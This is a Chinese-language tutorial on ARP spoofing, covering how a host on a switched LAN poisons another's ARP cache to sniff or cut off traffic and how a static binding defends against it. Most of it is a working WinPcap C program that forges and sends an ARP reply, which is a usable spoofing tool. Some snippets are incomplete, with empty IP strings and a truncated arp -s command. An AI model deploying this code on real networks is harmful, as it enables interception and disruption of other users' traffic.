ARP欺骗的原理可简单的解释如下:假设有三台主机A,B,C位于同一个交换式局域网中,监听者处于主机A,而主机B,C正在通信。现在A希望能嗅探到B->C的数据,于是A就可以伪装成C对B做ARP欺骗--向B发送伪造的ARP应答包,应答包中IP地址为C的IP地址而MAC地址为A的MAC地址。 这个应答包会刷新B的ARP缓存,让B认为A就是C,说详细点,就是让B认为C的IP地址映射到的MAC地址为主机A的MAC地址。这样,B想要发送给C的数据实际上却发送给了A,就达到了嗅探的目的。我们在嗅探到数据后,还必须将此数据转发给C,这样就可以保证B,C的通信不被中断。以上就是基于ARP欺骗的嗅探基本原理,在这种嗅探方法中,嗅探者A实际上是插入到了B->C中,B的数据先发送给了A,然后再由A转发给C,其数据传输关系如下所示:
B----->A----->C B<----A<------C
Windows系统中缓存了目前的MAC地址与IP地址之间的映射,通过arp -a命令可以获得,如下图:
笔者的电脑IP地址为192.168.1.2,通过网关192.168.1.1到达公网。当某人用"网络剪刀手"或"网络执法官"一类的软件给笔者发送伪造的ARP报文后,笔者的Windows会缓存一个错误的网关MAC地址。由于IP包最终要通过MAC地址寻址到192.168.1.1网关进行转发,而本机对192.168.1.1 MAC地址的记录已经是错的了,这样,IP包将无法到达网关,笔者将不能再连接Internet,这就是恼人的"网络剪刀手"的工作原理。如果受到了恶意的ARP欺骗,我们只需要将网关的IP地址与MAC地址在本机静态绑定,运行如下命令:
ARP -s 00-33-44-57-17-a3
#define EPT_IP 0x0800/* type: IP*/ #define EPT_ARP 0x0806/* type: ARP */ #define EPT_RARP 0x8035/* type: RARP */ #define ARP_HARDWARE 0x0001/* Dummy type for 802.3 frames */ #define ARP_REQUEST 0x0001/* ARP request */ #define ARP_REPLY 0x0002/* ARP reply */ #define Max_Num_Adapter 10
#pragma pack(push, 1)
typedef struct ehhdr { unsigned chareh_dst[6]; /* destination ethernet addrress */ unsigned chareh_src[6]; /* source ethernet addresss */ unsigned shorteh_type; /* ethernet pachet type*/ } EHHDR, *PEHHDR;
typedef struct arphdr { unsigned shortarp_hrd; /* format of hardware address */ unsigned shortarp_pro; /* format of protocol address */ unsigned chararp_hln; /* length of hardware address */ unsigned chararp_pln; /* length of protocol address */ unsigned shortarp_op; /* ARP/RARP operation */
unsigned chararp_sha[6]; /* sender hardware address */ unsigned longarp_spa; /* sender protocol address */ unsigned chararp_tha[6]; /* target hardware address */ unsigned longarp_tpa; /* target protocol address */ } ARPHDR, *PARPHDR;
typedef struct arpPacket { EHHDRehhdr; ARPHDRarphdr; } ARPPACKET, *PARPPACKET;
#pragma pack(pop)
int main(int argc, char *argv[]) { static char AdapterList[Max_Num_Adapter][1024]; char szPacketBuf[600]; char MacAddr[6];
LPADAPTERlpAdapter; LPPACKETlpPacket; WCHARAdapterName[2048]; WCHAR *temp, *temp1; ARPPACKET ARPPacket;
ULONG AdapterLength = 1024; int AdapterNum = 0; int nRetCode, i;
//Get The list of Adapter if (PacketGetAdapterNames((char*)AdapterName, &AdapterLength) == FALSE) { printf("Unable to retrieve the list of the adapters!\n"); return 0; }
temp = AdapterName; temp1 = AdapterName; i = 0; while ((*temp != '\0') || (*(temp - 1) != '\0')) { if (*temp == '\0') { memcpy(AdapterList[i], temp1, (temp - temp1) *2); temp1 = temp + 1; i++; } temp++; }
AdapterNum = i; for (i = 0; i < AdapterNum; i++) wprintf(L "\n%d- %s\n", i + 1, AdapterList[i]); printf("\n");
//Default open the 0 lpAdapter = (LPADAPTER)PacketOpenAdapter((LPTSTR)AdapterList[0]); //取第一个网卡
if (!lpAdapter || (lpAdapter->hFile == INVALID_HANDLE_VALUE)) { nRetCode = GetLastError(); printf("Unable to open the driver, Error Code : %lx\n", nRetCode); return 0; }
lpPacket = PacketAllocatePacket(); if (lpPacket == NULL) { printf("\nError:failed to allocate the LPPACKET structure."); return 0; }
ZeroMemory(szPacketBuf, sizeof(szPacketBuf));
if (!GetMacAddr("BBBBBBBBBBBB", MacAddr)) { printf("Get Mac address error!\n"); } memcpy(ARPPacket.ehhdr.eh_dst, MacAddr, 6); //源MAC地址
if (!GetMacAddr("AAAAAAAAAAAA", MacAddr)) { printf("Get Mac address error!\n"); return 0; } memcpy(ARPPacket.ehhdr.eh_src, MacAddr, 6); //目的MAC地址。(A的地址)
ARPPacket.ehhdr.eh_type = htons(EPT_ARP);
ARPPacket.arphdr.arp_hrd = htons(ARP_HARDWARE); ARPPacket.arphdr.arp_pro = htons(EPT_IP); ARPPacket.arphdr.arp_hln = 6; ARPPacket.arphdr.arp_pln = 4; ARPPacket.arphdr.arp_op = htons(ARP_REPLY);
if (!GetMacAddr("DDDDDDDDDDDD", MacAddr)) { printf("Get Mac address error!\n"); return 0; } memcpy(ARPPacket.arphdr.arp_sha, MacAddr, 6); //伪造的C的MAC地址 ARPPacket.arphdr.arp_spa = inet_addr(""); //C的IP地址
if (!GetMacAddr("AAAAAAAAAAAA", MacAddr)) { printf("Get Mac address error!\n"); return 0; } memcpy(ARPPacket.arphdr.arp_tha, MacAddr, 6); //目标A的MAC地址 ARPPacket.arphdr.arp_tpa = inet_addr(""); //目标A的IP地址
memcpy(szPacketBuf, (char*) &ARPPacket, sizeof(ARPPacket)); PacketInitPacket(lpPacket, szPacketBuf, 60);
if (PacketSetNumWrites(lpAdapter, 2) == FALSE) { printf("warning: Unable to send more than one packet ina single write ! \ n "); }
if (PacketSendPacket(lpAdapter, lpPacket, TRUE) == FALSE) { printf("Error sending the packets!\n"); return 0; }
printf("Send ok!\n");
// close the adapter and exit PacketFreePacket(lpPacket); PacketCloseAdapter(lpAdapter); return 0; } | 上述程序中使用了著名的开放项目Winpcap(The Packet Capture and Network Monitoring Library for Windows)中的API,项目网址为:http://www.winpcap.org/。Winpcap是UNIX下的libpcap移植到Windows下的产物,工作于驱动(Driver)层,能以很高的效率进行网络操作。其提供的packet.dll中包含了多个功能强大的函数,我们聊举几例:
LPPACKET PacketAllocatePacket(void);
LPADAPTER PacketOpetAdapter(LPTSTR AdapterName);
VOID PacketCloseAdapter(LPADAPTER lpAdapter);
VOID PacketFreePacket(LPPACKET lpPacket);
BOOLEAN PacketGetAdapterNames(LPSTR pStr,PULONG BufferSize);
BOOLEAN PacketReceivePacket(LPADAPTER AdapterObject,LPPACKET lpPacket,BOOLEAN Sync);
数据报编码结构: |bpf_hdr|data|Padding|bpf_hdr|data|Padding| BOOLEAN PacketSendPacket(LPADAPTER AdapterObject,LPPACKET lpPacket, BOOLEAN Sync);